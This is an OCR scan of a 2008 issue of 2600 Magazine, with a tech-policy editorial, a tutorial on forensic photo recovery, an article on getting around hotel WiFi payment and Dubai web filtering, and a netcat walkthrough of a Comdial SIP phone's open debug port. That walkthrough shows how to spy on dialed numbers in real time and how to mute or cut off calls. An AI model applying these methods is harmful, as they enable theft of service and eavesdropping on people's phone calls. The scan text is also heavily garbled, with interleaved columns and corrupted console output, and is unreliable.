2600 v25 n4 (winter 2008)

-
Tra
6
8
11
13
15
18
20
24
26
29
29
,30
32
133
34
4 8

We appear to be at one of those moments cou Id be on the verge of movi ng in a whole
in history. At least in theory it seems l i ke new direction.
we've arrived at a turning point, where the Of course, we expect to be disappoi nted.
opportunity exists for significant and lasting Let us not forget how similar some of these
change to occur. Th is is not a time to be hopes were in 1993, when the first Cli nton
asleep. administration took power. They were
The recent election that took place in the credited with moving the White House into
United States was historic for a number of the Information Age, replacing typewriters
reasons. For the first time, a member of a with computers, updating the phone system,
minority group was elected to the nation's and making technical competence the norm
highest office, an occurrence many never rather than the exception. But then, it wasn't
expected to see in their l ifetimes. People too long before we were being faced with
from a l l over the country who had never the Clipper Chip controversy.
before been involved in pol itics felt a new For those who aren't fami l iar,
sense of hope and empowerment throughout implementation of this flavor of encryption
the campaign, a feeling that culminated on (Clipper being for phones and phone
Election Day when their victory became systems) would have given the government
official. Unprecedented celebrations broke the keys (l iteral ly) to all approved encrypted
out throughout American cities and even i n traffic with many fearing that any other kind
many foreign ones. This perception of true of encryption wou ld soon become i l legal . It
change, even if it never goes beyond a mere was a l l based on a closed system so nobody
perception, has been inspiring and has given real ly knew how secure it was. The idea of
many of us an a l l too rare dose of optimism. just trusti ng the government to do the right
In the hacker/technological world, we th ing didn't real ly sit wel l with anyone
have a particular reason to open our eyes. understanding what was at stake. Strong
On a technical front, Barack Obama seems to opposition from the rapidly growing I nternet
get it, qu ite a bit more than his predecessors commun ity and the emergence of publ ic
and opponents. He spoke out i n favor of encryption tools such as PCP helped to keep
net neutral ity years ago and seemed quite this bad idea from ever taki ng off and the
fam i l iar with why it was important. His project official ly died i n 1996.
campaign clearly understood how to use The Digital Telephony Law (or CALEA)
h igh tech to thei r advantage, rangi ng from made it orders of magnitude easier to tap
the widespread use of text messaging i n telephone cal l s i n digital switches. It was
order to reach supporters to embraci ng passed i n 1994. The Digital Mil lennium
the I nternet i n getting the message out and Copyright Act (which 2600 was the first
ral lyi ng support. This is significant. Someone official victim of) became law in 1998 and
who has an actual grasp and comprehension created all sorts ofrestrictions and regulations
of technology, along with its risks and on how people could use technology on their
essential freedoms, is poised to push pol icy own computers or elsewhere, threateni ng
i n a direction that m ight benefit a l l of us. We the val ued concepts of fair use a'ld reverse
Page 4 -------------------- 2600 Magazine

engineering. I will prevent network providers from
There are more examples of bad discriminating in ways that limit the freedom
legislation coming out of the Cli nton years of expression on the Internet. Because most
that served to set back technology, as wel l Americans only have a choice o f only one
as stifle creativity and free speech. The or two broadband carriers, carriers are
point here is not to list them but merely tempted to impose a toll charge on content
to acknowledge the fact that having one and services, discriminating against websites
side or another in power is no guarantee that are unwilling to pay for equal treatment.
that things are going to move in a positive This could create a two-tier Internet in which
direction. We certainly don't have to l ist a l l websites with the best relationships with
of the bad ideas and precedents that came network providers can get the fastest access
out of the last eight years on everything from to consumers, while all competing websites
border searches of laptops to increased remain in a slower lane. Such a result would
domestic survei l lance - each in the name threaten innovation, the open tradition and
of "homeland security" and each having archileclure oflhe Inlernet, and competition
absol utely no effect on anything truly among content and backbone providers. It
dangerous, but a l l too much of an effect would also threaten the equality of speech
on our everyday l ives and our perceptions through which the Internet has begun to
of what constitutes normal ity. We can only transform American political and cultural
hope that reversal and termination of some discourse. Accordingly, network providers
of these pol icies is h igh on the priority l ist should not he allowed to charge fees to
of the new administration. privilege the content or applications of some
The lesson here is that possession of wehsites and Internet applications over
mere fami l iarity with technology doesn't others. This principle will ensure that the new
mean that the people running things wi l l competitors, especially small or non-profit
act in a manner that's fair to the rest of us. speakers, have the same opportunity as
Oftentimes it works in exactly the opposite incumbents to innovate on the Internet and
way. Power and control do strange things to to reach large audiences. I will protect the
people, after a l l . Internet�s traditional openness to innovation
A great paral lel can be seen in schools. and creativity and ensure that it remains a
Who wi l l allow you to experiment and platform for free speech and innovation thai
accompl ish more on the school computer
will benefit consumers and our democracy."
network? The teacher who knows next to
Those remarks came from an interview
nothing about the subject? Or the self-
Obama gave back in 2007. He clearly has a
I· d t' F th f h
handle on what the Internet is about and the
proc alme exper ( or ose 0 us w 0
feel comfortable working and playing
potential it promises, as wel l as the threat
with technology, being left alone and
posed by those entities who want to create
more controls and restrictions. It is essential
avoiding micromanagement is all we
that th is ideal ism not be sacrificed to the
rea l ly need. But when those who imagine
themselvesI'n h f I 'f th d 't
powerfu l interests that stand to benefit from
c arge ee asI ey on
the reigning in of freedom. And that task
have total control and understanding over
falls to us - the people - to ensure that this
every nuance of the environment they're promise is upheld.
supervising, that's when fear and irrational
behavior take hold. I n school we see that in
For now, though, let us bel ieve there is
the form of unreasonable restrictions and
hope for some positive shifts in the road
we've been going down. The worst thing we
punishment. In the government, we see it as cou ld do wou ld be to resign ourselves to the
an obsession with survei I lance and speech opi n ion that change is never possible or that it
mon itori ng. Those in charge are always in can only occur when a phenomenal amount
fear of being ecl ipsed by the very people of conditions are met - which basically
they're supposed to be controlling. And we achieves the same effect as perpetua l
don't expect that underlying trepidation to pessimism. Even in the best case scenario,
change. we know there wi l l be setbacks and pol icies
That is not to say that we can't hang onto that ultimately prove detrimental . But in this
some optimism. A quote l i ke this provides historic moment, there is great potential for
us with ample reason: steps to be taken and for a new begi nning
"The Internet is the most open network on a variety of levels. It wi l l be worthwhi le
in history. We have to keep it that way. to pay close attention.
Winter 2008-2009 ------------------ Page 5

INTRODUCTION TO
FORENSIC DATA RECOVERY
by Paradox
Recently wh i le travel i ng in Cuba, I had the
u nfortunate l uck of hav i ng an enti re week' s
worth o f photos i nadvertently deleted from
my d igita l camera ' s memory card. These
photos were obviously not something I cou ld
have recreated and I had n ' t yet been able to
copy them off of the card onto the computer.
Was a l l lost? No! By employ i ng some basic
computer forensics ski l ls and some Linux
kung-fu I was able to recover all of the lost
photos.
Fi rst thi ngs fi rst we need to learn about
what happens when you "delete" a fi le from
a d igital system l i ke a computer, cel lphone,
camera, etc. Wh i l e many hold the naive
notion that a delete is fi nal and that the bits
go to the big /dev/nu l l i n the sky, it probably
won 't come as a surprise to many of you that
this isn't the case at a l l .
W h i l e each fi lesystem handles deletion
differently in techn ical implementation, the
concept they uti l ize is the same. When you
delete a fi le from the storage med i u m where
your fi lesystem i s located, the bits that your
data is stored i n are simply marked as "unused".
Deletion by the defi n ition of the word tends to
imply an "overwriti ng" or "zeroi ng" procedu re,
i .e. actually getting rid of the data. Actua l ly
zeroing the bits that hold you r to-be-deleted
data wou ld be a time i ntensive procedu re;
especially when you start to consider deletion
of large fi les. The "mark as unused" sol ution
accomp l ishes the same thing as far as the
operating system is concerned; the data wi l l
eventually b e overwritten by new data that
is written to disk. Th is "eventua l ly" clause is
what we can exploit to save our data.
your express desire! As
mentioned, after deleting a fi le, the space it
occupies i s free game for a nyth i ng that comes
along need i ng disk space. Therefore, if a
log fi le happens to be created immediately
after you delete your fi le, there is a chance
that some of that log fi le's data w i l l end up
overwriti ng you r deleted fi le.
Thus the only way to be sure that you r
deleted data wi l l remain i n an u ncorrupted
and recoverable form is to i m medi ately exit
the operating system, shut down the dev ice,
pu l l the plug, eject the disk, and otherwise
ensure that the device rema ins i n a read-on l y
state for t h e rest o f th is tutorial.
Now that we have the dev ice i n a state
where we feel confident that no new data
can be written to it, it wou ld be wise to make
an exact copy instead of worki ng with the
origi nal. Si nce our deleted fi les are marked as
free space at this poi nt, we can't just mount
the device as read only and use trusty old
cp to copy our deleted fi les off. I nstead, we
need to create a byte-for-byte copy of the
dev ice i ncluding all of the free space, s i nce
our deleted data is tucked away somewhere
i n there.
To do this, we' l l use the Linux dd
command. Th is command comes instal led
with every modern distribution of Linux
I have ever encountered, and wi l l surely
be i nsta l led on you rs. My recommended
procedu re is to down load and burn the
Knoppix Linux l ive C D. Th is has several
benefits, most importantly: Knoppix wi l l
mou nt any app l i cable fi lesystems i t fi nds o n
the computer a s read-on l y by defau lt. Th is is
prefect for our pu rposes si nce we don't want
to accidenta l l y write any data to the dev ice.
Once you have booted i nto the Knoppix
env i ronment we need to fi nd the Linux device
name of our target device and the partition
number. I n the case of my camera it was /dev/
sdb 1. Serial dev ice B, partition 1. I found this
by ru n n i ng:
ls -] /dev/disk/by-id/usb*
Obviously if you are searching for a
non-USB dev ice you wou ld excl ude the
"llsb*" section of the command that fi lters
the resu Its.
The fi rst, and arguably, most important
thi ng to take away from th is over-si mplified
lesson on fi le deletion is that you must
immediately disable writi ng to the dev ice you
wish to recover from. Operating systems and
device fi rmware are complex and very large
programs. They are constantly writi ng thi ngs
to d i sk without you r i ntervention. Background
processes are swapped to disk, log fi les
are being written to, and a l l sorts of data is
bei ng persisted. Th is a l l happens without
Page 6 --------------------- 2600 Magazine

Once we have the Linux device name we
can begin creating an i mage of the disk. Fi rst,
make sure you have enough free space on a
write-enabled dev ice to store the disk i mage.
The disk i mage will be the same size as the
total capacity of the dev ice we are try i ng to
recover from. Si nce I was recovering images
from a 1GB Memory card, I needed to make
sure I had -1G B free on my computer's hard
drive. To begin the i maging process enter the
command:
sudo dd if:<input device/
partition> of=<outputFile>
i .e. i n my case I ran :
sudo dd if:/dev/sdbl of:/
home/daniel/disklmage.dd
Th is i magi ng process may take awh ile
depending on the size of the disk partition you
are i magi ng. In my case, it took approximately
15 m i nutes. Once the i mage process is
complete, you can safely remove the dev ice
from your system and store it in a safe place.
With our disk i mage in hand we can perform
the recovery from any Linux machi ne.
Now wh i l e the tool we are plann i ng to
use to recover our data can work out-of-box
with a dd i mage, some tools can't. If you are
plan n i ng to use a tool that wants to work with
the fi lesystem itself then you ' l l want to mount
this dd i mage as a " Ioopback" dev ice. To do
that you wou ld run:
sudo mount - 0 loop -t <type>
-'<imageLocation> <IDountLocation>
i.e i n my case I ran :
sudo mount -0 loop -t vfat /home/
"daniel/disklmage.dd /rnnt/
"diskFiles
Make sure that you r mount location exi sts
before run n i ng thi s command. In my case if
the "diskFi les" folder didn't exist, the mount
wi ll fail.
We can now run our recovery tool to
scrape out as many fi les as we can from the
free (i .e. deleted) space of our device. The
tool we are going to use is called Foremost. It
i s a very simple to use tool that was origi nally
created by the u.S. Air Force and later made
open sou rce and public. It has the ability to
recover a few common fi letypes automatica l l y.
These types incl ude i mages, executables,
documents, mov ies, etc. It supports ext3, fat,
and ntfs fi lesystems, so chances are that you r
dev ice wi ll b e supported. More i nformation o n
t h e tool c a n b e found a t t h e website provided
at the end of th i s tutoria l . On a Debian system
it was j ust a matter of run n i ng the fol lowing
command to insta l l foremost.
sudo apt-get install foremost
to only recover that type. I n my case I knew
my camera saved the i mages as )pG fi l es. So
I ra n :
sudo foremost -t jpg - i /home/
"daniel/disklmage.dd -0 /home/
"daniel/recovered
If you wanted Foremost to try and recover
all types of files it cou ld (th is may take a long
ti me) you wou l d run:
sudo foremost - t all -i
-'<imageLocation> -0 <outputFolder>
The -t argument is what tel l s Foremost
which kind of fi les you want to recover. For
instance if you wanted to recover Office-type
documents such as .ppt and .doc you would
use -t ole. Consult the docu mentation to
fi nd out which fi le-type flags are supported.
Agai n, it is i mportant that the output folder
exists before you run Foremost. Once it has
fi nished you wi l l have hopefu l ly recovered
the data you were looking for to the recovery
folder you speci fied. There is however one
more hurdle to jump before you can fi nd
out. Foremost (l i ke most of the tools we've
used so far) can only operate as root. As such
the output files it generated are also owned
by root. To fix this we' l l chown them to our
user.
sudo chown -R <yourUser>:<yourUser>
"<outputFolder>
I n my case that meant run n i ng:
sudo chown -R daniel:daniel /home/
"daniel/recovered
You can now change di rectories i nto your
recovered folder. You 'll fi nd an audit text fi le in
the rootofyou r recovered fol der outl i n i ng what
Foremost was able to recover. Most i mportantly
though, you wi l l fi nd a l l of the recovered
fi les organ ized i nto fol ders by type. In my
case I found a l l 75 of my m issing )pGs in the
/home/daniel/recovered/jpg/ folder.
Hopefu lly you found your fi les too !
Th is tutorial should serve as a good starting
poi nt for you r journey i nto u nderstanding
computer forensics. Advanced topics exist to
supplement you r knowledge. For i nstance,
Foremost is l i m ited to specific filetypes. If
you want to recover other fi les you may have
to resort to using advanced software l i ke
Autopsy and Sleuthkit, but these req u i re a
deeper u nderstanding of computer forensics.
U ndoubted ly you will fi nd that the concepts
you learned i n this tutorial w i l l serve you well
if you attempt to further your knowledge.
Resources
http://foremost.sourceforge.net/
http://Linux.die.net/man/l/dd
http://Linux.die.net/man/8/mount
http://www.knoppix.org/
We are now ready to recover our fi les. If
you know the specific type of fi le you wish to
recover you can save time by tel l i ng Foremost
Winter 2008-2009 ------------------ Page 7

by forgotten247
Hacking Dubai
and More Internet
Proxy Loopholes
and password. I had no luck there. OK, try
n u mber two, wou ld enter i ng a name with a
blank or random password? Nope.
I had no i ntention of paying $40/day for
I nternet access for the next week, even at
my company's expense, so I pulled out my
i Phone to see if I cou ld get cel l-network web
access. Havi ng a U S-based i Phone locked
for AT&T meant no luck in that arena. I also
I recently had the opportun ity to go to
had a Black Berry and it worked fi ne on the
Dubai for a work fu nction. I was put up at
local provider network, however I didn't want
the Jumeirah resort, a n ice l i ttle spot on the
to browse using Black Berry'S watered-down
gulf with some great views, restaurants, and
web i nterface.
cl ubs. As any reader of 2600 wou ld do, the
Th i ngs were starting to look gri m, but I
fi rst th i ng I did when I got to the room was see
was not wil l i ng to give i n . I joi ned the i Phone
how I cou ld get onl i ne.
to the hotel WiFi setup a nd went through the
On the desk was a card outl i n i ng the
regi stration pages, hop i ng for some luck. I
process to do so. I cou ld plug i n an Ethernet
noticed differences on the page when viewed
cable, go through a few screens, and once through i Phone, from what I had seen on the
registered I ' d be able to use wi red or wi reless laptop. Mai n l y, qu ite a few sections of text
access throughout the resort. J ust what I that had been present on the laptop didn't
needed, beach-side WiFi to enjoy the net and show up on the i Phone. Instead there was an
the G ulf at the same ti me. icon that indicated there was content that the
No worries, I thought, and I started the mobile Safari browser could not load.
process by disabl i ng the Ai rport on my Th is looked promis i ng. I fi n ished goi ng
MacBook Pro, pl ugging i n the Ethernet cable, through the registration pages and then I got it.
and fi ring up Safari. I was prompted with a On the page where the laptop's browser was
"J umeirah Hotel Internet Access" landing page, prompti ng me to select the amount of time I
and then clicked on the " I nternet Access" l i nk. wanted to pay for, I received a message saying
From there I chose " I n-House Guest" and that the registration process was completed,
accepted the terms and conditions which and I was in. I quickly typed i n a few U RLs
were pretty standard. and indeed I was on l i ne.
Then something hit me about the page to It seemed the registration and access
register my system. You ' d think a hotel that granting pages were dependent on web
charges $ 1 , 000+ US dol lars a n ight (yes, it components that were not compatible with
was that expensive) wou ld throw i n I nternet mobile Safari . Using that knowledge as a
access, but no, they didn't. The screen that j u mping poi nt, I was able to find that the web
came up wou ld allow users to register for one application used to provide I nternet access
hour of I nternet access for $30 AED (about $8 used Java components. For whatever reason
US) or $ 1 50 AED ($40 US) for 24 hours. the developers had decided that i nstead of
After paying, the system wou ld provide a faili ng closed, they fai led open, mea n i ng if
username and password that could then be there was an error with the app l i cation, no
entered i nto a form on the web system to ga i n access would b e granted. When the Java
access. Th is was a bit of a su rprise seeing as components didn't run, the system defaulted
the card on the desk made no mention of the to letting people through and granting access.
added cost, but I was game to see if there Dummies!
were any u n ique ways to ga i n access. Now I do th i nk the i Phone is a great l ittle
To get sta rted I disconnected the Ethernet device, but I didn 't want to do all my surfing
cable, switched to Ai rport, and went to the on my phone, so with a l ittle help from the
landing page to enter a random username ti nyproxy native application I had i nstall�d on
Page 8 -------------------- 2600 Magazme

it (you had to assume it was jail broken, didn't
you?) I poi nted my laptop to use the i Phone as
a proxy and off I went, free WiFi access across
the i Phone to the laptop.
Before I left I c i rcled back to va l idate
the security hole that allowed this, and
found that d isabl i ng Java on a browser on
the laptop resulted i n the same fu l l access
without need i ng to go through the registration
process. I also noticed that in the areas of the
hotel where there were bus i ness meeting
rooms the Wi Fi networks were completely
u n restricted, wh ich I found is the case at
most business/convention centers and worth
noting, although not much good to get on l i ne
from the privacy of you r room, or the a l l ure of
the beaches.
The moral of this segment of the story is
twofold: Fi rst, if you run i nto any WiFi apps
req u i ri ng registration, make sure to test them
out without th i ngs l i ke Java or ActiveX disabled
because you may be pleasantly surprised;
Second, a word to developers, you rea l l y
need t o th i n k beyond end-users accessing
the network on traditional setups and shou ld
always fa i l closed when i n doubt.
Now, the digital adventu res in Dubai
didn't stop there. After brows i ng a few sites
I ran i nto a nasty l ittle page tel l i ng me "SITE
B LOCKED", i n big bold red letters, with
sub-text, "We apologize the site you are
attempting to visit has been blocked due to its
content being i nconsistent with the rel igious,
cu ltura l, pol itical and moral val ues of the
U n ited Arab Emirates." Just for good measure
it was written i n Engl ish and Arabic.
Now, I can say for sure that there are
p lenty of sites I go to on a regular basis that
are i nconsistent with the moral va l ues of the
UAE, so, let's get around this th ing sha l l we?
Th is one was not too difficult, as I have run
i nto simi lar blocks i n China and other heav i l y
regulated areas. The way these typica l ly work
is using web proxy servers or applia nces with
fi ltering technology which classify sites by
type. Access is then a l l owed or den ied based
on type. SmartFi lter, as covered in the Spring
2 008 issue, is one of these technologies. The
article did a good job of descri b i ng a sol ution
to get around SmartFi lter, but it was a bit
overcomplicated for my l i k i ng. Fi rst, it rel ied
on people hav i ng an I nternet-facing host
that you cou l d get shel l access on. You also
needed the abil ity to fire up an ssh l i stener on
that server, and to set up a SOCKS proxy on
your cl ient system.
While this certainly is a viable technical
sol ution, and an educational article, the
assumption that people have access to an
I nternet-faci ng server they can set a service
up on is a bit beyond rea l ity, even for 2600
readers. If you are i n a corporate env i ron ment
there is a good chance that the PC pol icies
won't let you insta l l Putty or run u napproved
services on the cl ient. Places with I nternet
proxy fi lters typica l l y also have some level
of i nfrastructure mon itoring goi ng on, as wel l
as secu rity pol ic ies enforced through Active
D i rectory and/or PAC fi les that won't a l l ow
instal lation of software or changing you r web
4.11�-=::,t '��, .ill':::'� ,-,_�>i _2:9 '.t.:�:.6_",:,-; ''::'.J,i ,5.:dl 8:�'+') 11 ,>! ,_.Q..,..<.IL
91 ;;�.9Is.J1 91 �"L_",JI �,i ·'--sl".;::;;�11 p".cl.1 '-"-1I.>�o 1;.L.,.:'0 '.s,Js
6��1 G-:!-!.rQ-11 (A)!J)�I qJ9"':.J j.,_�_d!
�� p.9 d».J1 ,l�L?-",r..:...9 &�D � 0.))1 �Jb ,.��j
.L&9o;D •.sJs 6"9>�1 ul.Jo.:>.:.bJ1 ,,)�I
We apologize the site you are attempting to visit has been
blocked due to its content being inconsistent with the
religiOUS, cultural, political and moral values of the United
Arab Emirates.
If you think this site should not be blocked, please visit the
Feedback Form available on our webSite.
SITE BLOCKED
Winter 2008-2009 ------------------ Page 9

browser settings. Internet-facing server side.Jumpout onlineand
I have a different approach to getting do a search for "web proxy <web language>"
around Internet filtering proxies that puts where the web language is PHP or ASp,
less requirements on the users, both on the depending on the host you are using. PHProxy
server and client side. Rather than just give (http://sourceforge.net/projects/poxy/)
the solution, let's take a walk-through of how is one that comes to mind for PHp, and is
we get there. To start with, SmartFilter and near the top of the search results right now,
other filters are based on the URL or IP of the although that one is a little dated. It will work
site you are going to. They do not filter on fine, as will almost any others you come
content, at least none that I have run into yet. across. So, take whichever proxy solution
This is very important. The default reaction to interests you, drop it on your hosted web
this knowledge should be that if you can't get provider space, which hopefully has a nice
to a site because the host is blocked, go to a inconspicuous host name, and point your web
site on a host that isn't blocked that you can browser to it. Government-enforced proxies,
get the content through. such as Dubai's, as well as business/corporate
Let's try that out. Hop on over to Google, proxies, should let you slide right by. From
I haven't found them blocked yet, and type there you should just need to type in the URL
in a search that would result in the URL you you want to pull up, click a button, and sit
want to view. On the search results screen back as the page you wanted is displayed in
instead of clicking on the title of the page, its full form. Hopefully the web proxy you
click on the "Cached" link. Sweet, I'm in, are grabbed dynamically updates any HREF links
you? Probably. The cached content is served so as you navigate around, all future clicks go
from Google's servers which are not blocked, through your proxy. If it didn't, grab a different
since the host name in the URL is for Google, one. Most support doing this.
not the host which the proxy doesn't like. The beautiful part of this approach is that
This is a quick and dirty way to get to a single as long as the host name you are running your
page that is blocked, but Google's cache proxy from doesn't raise any suspicion, there
isn't always complete, following links from it would be no reason to have to change your
isn't always easy, and the pages don't always browser settings on the client. This is great if
render correctly. you are in a work environment where those
Let's keep going down with the intention settings are locked down.
of getting access to all the content, not just One word of caution for business users
the cached image of the blocked host. Most of though, SmartFilter and other web proxy
you should be well aware of anonymizer sites solutions typically are used to provide
that you can go to, enter a URL, and proxy the reports on the most visited websites, and
content through their servers. The intention of the most active Internet users. You should
these sites is to improve your security so the try to fly under that radar by only using your
web servers don't know who is making the proxy when absolutely necessary, and keep
request, however they can also be used for browsing from work at a minimum. The
you to get content from a site, without entering name of your host is important as well. If
that site's URL. That sounds exactly like what it does pop up on one of those reports the
we need, but unfortunately most of these are more official it looks the better. Don't register
well known by proxy filters, so going to one "iusethistobypassmyworksecurity.com" or
of those is not going to cut it. Are we stuck? "myporngateway.com" or you may not be in
Nope, we just need an anonymizer site that that job long enough to use it!
the proxies don't know about, and the best So, that concludes this chapter of my
way to get one is to host your own. Dubai adventures and another method of
Now, writing a web app to do this is very getting around Internet proxy filters. I enjoyed
simple, but it is even easier just to implement that week of sun, free net access, and freedom
one that already exists. I mean why spend to digitally go wherever needed. All thanks
time doing something that's already been to a poorly written WiFi registration app, an
done. Much like the prior article on getting iPhone, and a personal web proxy gateway.
around SmartFilter, you do still need some I do have to add that spending too much
Internet-facing server space for this, but it time in front of your system in Dubai would
can come in the form of a simple, low cost be quite a waste. Anyone who can get there
web hosting provider. No shell access or should plan on not sleeping too much - hitting
ability to run services needed. Just a provider the beaches all day and partying at the clubs
supporting PHP or ASP, which almost any all night is the only way to go, even when your
decent provider will support. online exploits or World of Warcraft buddies
The first thing needed is to set up the are calling. Just save up, Dubai isn't cheap!
Page 1 0 ------------------ 2600 Magazine

by Metalxl000
metalxl000@yahoo.com
I::I:-�IIi rp3
I::1:1 r··II:�i l:=i 1
know, but if I find them I wi l l let you a l l
know. Finally w e get to port 902 7, which
we wi l l be looking at today.
For those who are unfamiliar, Comdial I wi l l be using NetCat i n this tutorial, but
phones are Session In itiation Protocol (SI P) tel net or similar programs wi l l work as wel l .
phones that are used in offices. Instead Let's say our IP address is 1 92 . 1 68.22.237,
of traditional phone l i nes, these phones we wou ld connect to the phone with NetCat
connect to your local network via CATS. and you wou ld get the followi ng output:
/home/user> nc 192.168.22.237 9027
Although I have not worked with Cisco [l7:17:12.428] commandJloll:
phones, from what I have read they are got listenfd event
simi lar. [17:17:12.439J commandJloll:
action->fdJltr=9 accepted
I n this article I wi l l be tal ki ng about [l7:17:12.439] Connected
model "CONVERSip EP300", although I ' m to station 237
h h II k
[17:17 :12.441J Phone Version: 3.0.026
sure t at these tec n iques wi wor on [17:17:12.439J Phone Build Date:
other models. The first step i n exploring 06/05/2008 17:17:12
th h . t f d't I P dd Th [17 :17:12.439] Phone MD5Sum:e p one IS 0 In I S a ress. ere
3777ad4b3ac20ae9b56391267e81bb90
are two ways of doing this. The first way is [17:17:12.450] Boot Version: 1. 04
to wal k right up to the phone and get the [17:17:12.451] Boot Build Date:
i nformation. 05/03/2005 22:40:17
[17:17:12.450J Boot MD5Sum:
To do th is look at the LCD screen on the 5b84e34dcf06235e3763c755a9c57e9c
front of the phone. Right below the LCD Now that you are connected, type "?"
screen are three buttons. Each corresponds (without the quotes) and press "Enter". Th is
with a menu option on the screen. The three wi l l bring up the help menu as follows:
default options are "VMAIL" (Voice mail), *** Console commands
"DND" (Do Not Disturb), and "MENU". [19:42:19.089J @ [destip] - Send
Let's choose "MENU" then " N EXT". When
... debug log to remote syslog at
... [destip]
you see "2 I nfo" on the LCD Screen Press [19:42:19.089J or turn off if
"ENTER". Now press "N EXT" twice. This ... [destip] not specified
bri ngs you to a screen that says, "3 System [19:42:19.100J! [agressiveness] -
... Set speakerphone agressiveness
I nfo". Press "ENTER" and you wi l l see " 1 [19:42:19.100] 0..7 - debug flag level
Network I nfo". Press "ENTER" again. Press [19:42:19.099J a - debug flag toggle
" N EXT" three times and your screen wi l l [19:42:19.098J A - verbose flag toggle
[19:42:19.099J B - Generate Test
say, "4 I P Address". Press "ENTER" one last ... Tone on Bzr
time and you wi l i see the l P Address of the [19:42:19.109J c - core selection
h ... alt between 1, 2
p one.
[19:42:1 9.109] C - crash write t o 0
Now, if you can 't physically get to the [19:42:19.108] D - 1 - Si3000,
phone, you can find it easi ly with nmap, a ... Default - Dump DSP statistics
great tool for scanning networks. I ' m not [19:42:19.109J d - increase
d I h
'" dspDriverVerbose (wrap around
goi ng to go i nto etai on nmap, as t ere ... range 0-3)
have been plenty of articles written on it, [19:42:19.108J E - Dump EPROM info
and there is plenty of i nfo avai lable on the [19:42:19.llOJ e - Dump Ethernet
web. Once you run a ful l scan on the phone ... stats
[19:42:19.118] e 0 - reset Ethernet
with nmap you will find that ports 800 1 , ... stats
8002, 8003, 9026, 902 7 are open. Ports [19:42:19.ll9] g - gdb spin loop
8001 , 8002, 8003 I believe are used for the [19:42:19.120] H - Switch to Headset
f
[19:42:19.118] h - Switch to Handset
communication itself. Port 9026 asks or [19:42:19.120] I - Switch to Mic/Spkr
a user name and password, which I don't [19:42:19.ll9] i - Adjust mic input
Winter 2008-2009 ----------------- Page 1 1

.. gain (@DSP) +ldB (wrapf; around)
[19:42:19.128J k iflfo
[19:47:19.1291 K
... ticks since l�sl k�y event
[19:42:19.129J L LED test
119:42:19.12 [II M - Increase
... ADC fx (�lTic) gdin +1
r ]():47: 10.129) m D('('I(��C
-ADC Rx (Mic) y�irl -1
[1'J :,n :19.I J Cl1 u - ToeN le vu i ce
... ,Jet i v i dpl_,:"'cl iOt1
[.19:4:?:1 .14(1; p Play V()l
.. I.tlcl colnc' to Suundpi
[ :19.14C1j ( - IIt'Cju('s l
.. OSP Statlstics
119:4;':1'J.1l81 Inc
.. ��pkl Out Cal n (@I)�;P)
119:42:19.139J s prlnl
... stat-ion number- uf L.h.i �---, phonE:'
119:12:19.11C1J T Mute
.. ALL I. and Outputs
[19:42:1 .149J l - C;eneral.e DSP tones
[1,):12:19.148J U !nc ,;pkr
.... Vnl. (Dec Attenuation)
[19:/)):19.14BJ II - ilE'e ,;pkr
-Vol. (Inc Attcnuatjon)
I I :42:19.1191 V Inc ADC
.. Tx PC,� (0/1)) Sold in +1
l1Y :112:llJ . .l l_IO 1 v fiec Al!C
-Tx �)CA (Cl/P) (Jeli!r - 1
I I 'J :'12 :1 9. 1 4 8 J vi I II C AIlC
..... Ix l)C;/� (I/P) qain I J
r I 9 :4 ) : I q. I r:) (�I w - UpC l[)C
_ Hx PCA ("[/ }J) 9uin - L
I I q: : 1 c). I ',l) I X Tn(' AD(, [,i nc'
-(Jut qain (J)c'c ALLcnudLicHl)
ll,):,J:2: 19.1�}81 x Dec fl._DC i,irl(-'
-Oul (::ldirl (Inc f(LpIluatior:.)
[1 'l :� ::; :19 . 1 ')9J Y -
- [ncrease Line Ir1 gairl
[1'J:42:19.16C11 y
-Decrease IJinc Ir1 �Jujrl
119:42:19.1591 z - Tpc;t LCD/
.. /Notify msgs
119: :19.169J /, Play L Lone
Each of the letters listed run the function
indicated, when you type the letter and
press "Enter". So if you type "k" and press
"Enter, " it wi l l dump a bunch of system info
to your screen such as mic and speaker
vol ume, numbers dialed, cal led received,
cal l times, and a bunch of other i nfo. If
someone is using the phone you can use
the "u" and "U" command to raise and
lower the vol ume on the phone. Command
"I" wi l l switch on the speaker of the phone
while "h" wi l l set it back to the headset (this
is fun to do if you are i n the same room
as the person on the phone). "T" wi l l "Mute
ALL Input and Outputs", but I don 't know
how to unmute them unless they hang up
and redial. So, only use the "T" command if
you want to disconnect someone's cal l .
Some other commands are not a s fun.
to notice.
You may also notice that if someone
picks up the headset or presses buttons on
the phone whi le you are connected you
wi l l receive some output on your screen.
By default the output is mostly useless,
tel l i ng you that buttons have been pressed,
but not which buttons. But, if you change
the "debug flag level" by choosing a number
from 0 through 7 you can change the
amount of information displayed.
Level "3" is when things start getting
usefu l . It allows you to see what is bei ng
displayed on the LCD screen of the phone.
And si nce the LCD screen displays the
numbers being dialed and the numbers of
i ncoming calls, you can see, i n real time,
who is ca l l ing whom. Of course the more
output you have the harder it is to keep
track of, especia l ly when you get up to level
"6" or "T'. This is where your command l i ne
ski l ls cou ld come in handy. Using a simple
rommand surh as grep you can fi lter out
unwanted info. To only display messages
on l i ne one of the LCD screen, which is
where numbers bei ng dialed are displayed,
set the debug level to at least "3" and try the
fol lowi ng set of commands:
/home/user> n c 192.168.22.217
90271qrep LCDLincl
r. 2 0 : !) ') : � 2 .687 J LCDL enel: F:N1'ER NUMBER
[20:5,):51.109J LCDLinel: PRJ
[20:55:5/1.210J LCDLincl: PRI
[7C1:55:54.728J LCDLinel: 1
[7C1:55:55.0591 LCDLinel: 18
[20:S�: �}'J. 358J lOlL i ne1: 180
[20:')5:','-,.518J [,CTlLine1: 1800
[2C1:55:5',. 868J I,CDLim,1: 18004
[20:"5:56.109J l,CIlI,i nel: 180046
[20:�,�:�)6.��J9] l,ClJLinel: 1800466
[20:55:56.44')J LCDLinel: 18C104664
[2C1:55:56.6081 LCDLinel: 180046644
[20:55:S6.fl081 LCDLine1: 1800466441
[20:55:56.987J LCDLinel: 18004664411
As you can see, the grcp command
filtered out a lot of u nwanted i nfo and
showed the number bei ng dialed in real
time. Wel l, this concludes th is tutoria l . This
is just part one of my COMDIAL articles. I
hope to write at least two more.
Well, I guess this is where I do shout-outs to
people. So, hey Kenn, james, and Eric.
For example "z" wi l l cause a whole lot
of messages to flash on the screen of the
phone, but all the messages flash for about
one tenth of a second, making it very hard
Page 12 ------------------- 2600 Magazine

Hello, and greeti ngs from the Central poles or underground. Inside of a cable, there
Office! It's right around wi nter solstice here i n are up to 4,200 twisted copper pai rs. A pair
the Pacific Northwest, where the sun comes up of th i n copper wi res, known as tip and ring,
